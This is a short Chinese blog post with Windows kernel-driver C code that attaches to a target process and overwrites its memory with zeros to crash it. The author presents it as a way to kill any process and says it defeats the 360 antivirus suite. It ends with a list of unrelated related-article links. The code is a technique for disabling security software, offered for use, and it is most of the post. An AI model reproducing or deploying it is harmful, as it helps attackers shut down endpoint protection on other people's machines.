废话不多说 先上代码。

static void DProKill(HANDLE pid){

PEPROCESS pe = DProPid2Eprocess(pid);

if (NULL == pe) {

return ;

}

KeAttachProcess(pe); //这里改为指定进程的 EPROCESS

for(int i=0x10000;i<0x20000000;i+=PAGE_SIZE) {

__try {

memset((addr_t)i,0,PAGE_SIZE); //把进程内存全部置零

}

_except(1) {

;

}

}

KeDetachProcess();

}

static PEPROCESS DProPid2Eprocess(HANDLE pid){

PEPROCESS ret = NULL;

if (NT_SUCCESS(PsLookupProcessByProcessId(pid,&ret))){

return ret;

}

return NULL;

}

原理就是到目标进程空间各种破坏内存,让其崩溃,亲测360可杀。

欢迎关注 windows驱动编程微信公众号,微信号:driverdevelop

转载于:https://www.cnblogs.com/xujinping/p/4912247.html

windows内核中杀任意进程,可杀360!相关推荐

  1. Windows系统中常见的进程DOS操作命令

    Windows系统中常见的进程DOS操作命令 1. 查看指定端口的占用情况 语法: netstat -aon | findstr 端口号 例如:查看目前已经启动的nginx进程号 netstat -a ...

  2. 谷歌浏览器32位安装包_谷歌浏览器发布紧急安全更新修复Blink内核中的任意代码执行漏洞...

    上月底谷歌浏览器推送紧急安全更新对浏览器漏洞进行修复,当时谷歌浏览器博客并未公布漏洞的具体细节信息. 蓝点网当时也在文章中称通常这种不公布漏洞的更新,都是比较严重的问题因此只有等多数用户修复后才会公开 ...

  3. 在windows内核模式下隐藏进程

    进程隐藏之内核实现 1.在内核模式下,系统为每个进程维护了一个EPROCESS结构体,系统所有的进程是通过EPROCESS结构体中的一个ActiveProcessLinks指向的双端链表连接起来的,通 ...

  4. 驱动开发:内核中实现Dump进程转储

    多数ARK反内核工具中都存在驱动级别的内存转存功能,该功能可以将应用层中运行进程的内存镜像转存到特定目录下,内存转存功能在应对加壳程序的分析尤为重要,当进程在内存中解码后,我们可以很容易的将内存镜像导 ...

  5. c++引用另一个类的方法_利用CVE20191132:Windows内核中的另一个NULL指针取消引用...

    NULL指针取消引用应该早在几年前就已终止,但仍在恶意软件攻击中被发现和使用.这篇文章探讨了CVE-2019-1132的内部细节,Buhtrap小组将其用于针对东欧的受害者. 介绍 我们在本文中讨论的 ...

  6. 在Windows 10中使用TortoiseGit进程gitlab仓库的管理

    前提条件 已在windows上安装TortoiseGit. 说明:TortoiseGit是一个windows 外壳程序,也就是会集成在文件夹的右键菜单中,类似svn:而不是一个独立的客户端程序. 参考 ...

  7. 专门针对功能强大的内核级后门设计的手杀工具 --icesword使用方法

    IceSword,也称为冰刀或者冰刃,有些地址简称IS,是USTC的PJF(http://www.blogcn.com/user17/pjf/index.html)出品的一款系统诊断.清除利器. 下载 ...

  8. 【Linux 内核】进程管理 ( 进程特殊形式 | 内核线程 | 用户线程 | C 标准库与 Linux 内核中进程相关概念 | Linux 查看进程命令及输出字段解析 )

    文章目录 一.进程特殊形式 ( 内核线程 | 用户线程 ) 二.C 标准库与 Linux 内核中进程相关概念 三.Linux 查看进程命令及输出字段解析 一.进程特殊形式 ( 内核线程 | 用户线程 ...

  9. 论文中文翻译——Double-Fetch情况如何演变为Double-Fetch漏洞:Linux内核中的双重获取研究

    本论文相关内容 论文下载地址--Web Of Science 论文中文翻译--How Double-Fetch Situations turn into Double-Fetch Vulnerabil ...

最新文章

  1. oracle 分页写法
  2. Swift解读专题四——字符串与字符
  3. 基于深度学习的图像语义分割技术概述之4常用方法
  4. python的xlwt模块的常用方法
  5. 在JavaScript中实现yield,实用简洁实现方式。
  6. 【报告分享】抖音品牌主页运营官方指导手册.pdf(附下载链接)
  7. java课程设计学生信息管理_JAVA课程设计---学生基本信息管理系统
  8. .NET 4 并行(多核)编程系列之一入门介绍
  9. oracle起定时任务,每隔1秒执行一次
  10. 135.001 智能合约设计-——单员工薪酬系统
  11. angularjs 资源集合
  12. 使用sed在文件中定位文本的方式
  13. 2021年计算机网络常见面试题
  14. CXK, 出来打球!
  15. HPC应用安装之roms
  16. 小菜叫你玩破解和逆向(1)
  17. Ubuntu 20.04安装微信和QQ,解决微信不能输入中文
  18. SICP 练习1.8
  19. React Native 程序部署至 iOS 应用商店之前需要的配置和如何生成 release 版本的 APK 包
  20. 12万字零碳智慧校园数字化节能监管管控平台建设方案2022

热门文章

  1. IE6 浮动层背景不显示
  2. Ajax PHP 边学边练 之四 表单
  3. jQuery框架学习第一天:开始认识jQuery
  4. 网络工程师的职业发展路线
  5. VSTS Code Analysis 错误 CA1014 CLSCompliantAttribute 及Suppress Message (镇压Code Ananlysis)...
  6. haproxy对mysql集群进行负载均衡
  7. Vue2.0 + ElementUI 手写权限管理系统后台模板(一)——简述
  8. Javascript Symbol 隐匿的未来之星
  9. Windows 市场份额十年来首次跌破 90%
  10. 文件下载类型__response